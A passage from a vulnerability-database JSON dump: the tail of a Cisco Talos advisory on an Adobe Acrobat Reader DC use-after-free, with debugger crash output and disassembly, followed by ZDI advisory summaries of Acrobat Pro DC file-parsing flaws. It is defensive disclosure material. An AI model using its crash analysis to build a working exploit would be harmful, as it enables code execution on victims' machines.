EScript!mozilla::HashBytes+0x00026f58\n 610f17da EScript!mozilla::HashBytes+0x00021164\n 610f0606 EScript!mozilla::HashBytes+0x0001ff90\n 610f0511 EScript!mozilla::HashBytes+0x0001fe9b\n 610f0458 EScript!mozilla::HashBytes+0x0001fde2\n 610d9e2e EScript!mozilla::HashBytes+0x000097b8\n 611185ec EScript!mozilla::HashBytes+0x00047f76\n 61118370 EScript!mozilla::HashBytes+0x00047cfa\n 61117de3 EScript!mozilla::HashBytes+0x0004776d\n 61116cd5 EScript!mozilla::HashBytes+0x0004665f\n 61186428 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f743\n 58e4ed5d AcroRd32!AIDE::PixelPartInfo::operator=+0x000e450d\n 58d8cb1e AcroRd32!AIDE::PixelPartInfo::operator=+0x000222ce\n 58d8922c AcroRd32!AIDE::PixelPartInfo::operator=+0x0001e9dc\n 58bdefca AcroRd32!AX_PDXlateToHostEx+0x0015a229\n \n\nIf we examine the code immediately following the point of the crash, we can see the following:\n \n \n 0:000> u eip\n Annots!PlugInMain+0x7388f:\n 5ebd7790 8b10 mov edx,dword ptr [eax]\n 5ebd7792 8d4df0 lea ecx,[ebp-10h]\n 5ebd7795 51 push ecx\n 5ebd7796 8bc8 mov ecx,eax\n 5ebd7798 ff5248 call dword ptr [edx+48h]\n \n\nSince the area of the freed memory is quickly used in an indirect `call` instruction, having control over the contents of this freed memory region can lead to arbitrary code execution.\n\nIt should be noted that this issue is very similar in nature to TALOS-2018-0569.\n\n### Crash Information\n \n \n 0:000> g\n (17e0.153c): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=253b8ef8 ebx=00000000 ecx=5f1ca370 edx=5f1ca378 esi=1dea2fc0 edi=6e66cfb8\n eip=5ee57790 esp=0052c948 ebp=0052c968 iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\n Annots!PlugInMain+0x7388f:\n 5ee57790 8b10 mov edx,dword ptr [eax] ds:0023:253b8ef8=????????\n 0:000> !heap -p -a eax \n address 253b8ef8 found in\n _DPH_HEAP_ROOT @ 61000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n 252b14ac: 253b8000 2000\n 66d590b2 verifier!AVrfDebugPageHeapFree+0x000000c2\n 774969cc ntdll!RtlDebugFreeHeap+0x0000002f\n 77459e07 ntdll!RtlpFreeHeap+0x0000005d\n 774263a6 ntdll!RtlFreeHeap+0x00000142\n 7565c614 kernel32!HeapFree+0x00000014\n 6901ecfa MSVCR120!free+0x0000001a [f:\\dd\\vctools\\crt\\crtw32\\heap\\free.c @ 51]\n 5f50524f EScript!PlugInMain+0x000026b0\n 5f505206 EScript!PlugInMain+0x00002667\n 5f541c50 EScript!mozilla::HashBytes+0x000315da\n 5f51388f EScript!mozilla::HashBytes+0x00003219\n 5f5132f3 EScript!mozilla::HashBytes+0x00002c7d\n 5f635d4c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf067\n 5f636342 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf65d\n 5f635baf EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ceeca\n 5f63633b EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf656\n 5f637140 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000d045b\n 5f63518e EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ce4a9\n 5f5375ce EScript!mozilla::HashBytes+0x00026f58\n 5f5317da EScript!mozilla::HashBytes+0x00021164\n 5f530606 EScript!mozilla::HashBytes+0x0001ff90\n 5f530511 EScript!mozilla::HashBytes+0x0001fe9b\n 5f530458 EScript!mozilla::HashBytes+0x0001fde2\n 5f519e2e EScript!mozilla::HashBytes+0x000097b8\n 5f5585ec EScript!mozilla::HashBytes+0x00047f76\n 5f558370 EScript!mozilla::HashBytes+0x00047cfa\n 5f557de3 EScript!mozilla::HashBytes+0x0004776d\n 5f556cd5 EScript!mozilla::HashBytes+0x0004665f\n 5f5c6428 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f743\n 5a57ed5d AcroRd32!AIDE::PixelPartInfo::operator=+0x000e450d\n 5a4bcb1e AcroRd32!AIDE::PixelPartInfo::operator=+0x000222ce\n 5a4b922c AcroRd32!AIDE::PixelPartInfo::operator=+0x0001e9dc\n 5a30efca AcroRd32!AX_PDXlateToHostEx+0x0015a229\n 0:000> k\n # ChildEBP RetAddr \n WARNING: Stack unwind information not available. Following frames may be wrong.\n 00 0052c968 5f53d6ca Annots!PlugInMain+0x7388f\n 01 0052c9d8 5f541c50 EScript!mozilla::HashBytes+0x2d054\n 02 0052ca08 5f51388f EScript!mozilla::HashBytes+0x315da\n 03 0052ca98 5f5132f3 EScript!mozilla::HashBytes+0x3219\n 04 0052cab4 5f635d4c EScript!mozilla::HashBytes+0x2c7d\n 05 0052cb74 5f636342 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xcf067\n 06 0052cc08 5f635baf EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xcf65d\n 07 0052cc54 5f63633b EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xceeca\n 08 0052cce8 5f637140 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xcf656\n 09 0052ce8c 5f63518e EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xd045b\n 0a 0052cf28 5f5375ce EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xce4a9\n 0b 0052cf9c 5f5317da EScript!mozilla::HashBytes+0x26f58\n 0:000> u\n Annots!PlugInMain+0x7388f:\n 5ee57790 8b10 mov edx,dword ptr [eax]\n 5ee57792 8d4df0 lea ecx,[ebp-10h]\n 5ee57795 51 push ecx\n 5ee57796 8bc8 mov ecx,eax\n 5ee57798 ff5248 call dword ptr [edx+48h]\n 5ee5779b 8365fc00 and dword ptr [ebp-4],0\n 5ee5779f 8bc8 mov ecx,eax\n 5ee577a1 8b35000d2c5f mov esi,dword ptr [Annots!PlugInMain+0x4dcdff (5f2c0d00)]\n \n\n### Timeline\n\n2018-05-08 - Vendor Disclosure \n2018-07-10 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0599\n\nPrevious Report\n\nTALOS-2018-0590\n", "edition": 3, "modified": "2018-07-10T00:00:00", "published": "2018-07-10T00:00:00", "id": "TALOS-2018-0592", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0592", "title": "Adobe Acrobat Reader DC JSON Stringify Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:40:28", "bulletinFamily": "info", "cvelist": ["CVE-2018-4972"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-456", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-456/", "title": "Adobe Acrobat Pro DC ImageConversion EMF Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:40:42", "bulletinFamily": "info", "cvelist": ["CVE-2018-4970"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-454", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-454/", "title": "Adobe Acrobat Pro DC ImageConversion EMF Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:41:08", "bulletinFamily": "info", "cvelist": ["CVE-2018-4973"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPEG files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-457", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-457/", "title": "Adobe Acrobat Pro DC ImageConversion JPEG Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:40:09", "bulletinFamily": "info", "cvelist": ["CVE-2018-4949"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMR_COMMENT structures embedded inside EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-06-26T00:00:00", "id": "ZDI-18-598", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-598/", "title": "Adobe Acrobat Pro DC ImageConversion EMF EMR_COMMENT Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:41:23", "bulletinFamily": "info", "cvelist": ["CVE-2018-4949"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-437", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-437/", "title": "Adobe Acrobat Pro DC EMF Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:41:12", "bulletinFamily": "info", "cvelist": ["CVE-2018-4950"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the EMR_STRETCHDIBITS record in EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code under the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-438", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-438/", "title": "Adobe Acrobat Pro DC EMF EMR_STRETCHDIBITS Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:07", "bulletinFamily": "info", "cvelist": ["CVE-2018-4981"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPEG images embedded inside EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code under the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-465", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-465/", "title": "Adobe Acrobat Pro DC ImageConversion EMF JPEG Parsing Memory Corruption Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:42:11", "bulletinFamily": "info", "cvelist": ["CVE-2018-4968"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMR_CREATEDIBPATTERNBRUSHPT structures in EMF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, heap-based buffer. An attacker can leverage this vulnerability to execute code under the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-452", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-452/", "title": "Adobe Acrobat Pro DC ImageConversion EMF EMR_CREATEDIBPATTERNBRUSHPT Heap-based Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:42:14", "bulletinFamily": "info", "cvelist": ["CVE-2018-4976"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EmfPlusDrawCurve records in EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-460", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-460/", "title": "Adobe Acrobat Pro DC ImageConversion EMF EmfPlusDrawCurve Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:41:39", "bulletinFamily": "info", "cvelist": ["CVE-2018-4967"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XPS files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code under the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-451", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-451/", "title": "Adobe Acrobat Pro DC ImageConversion XPS Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
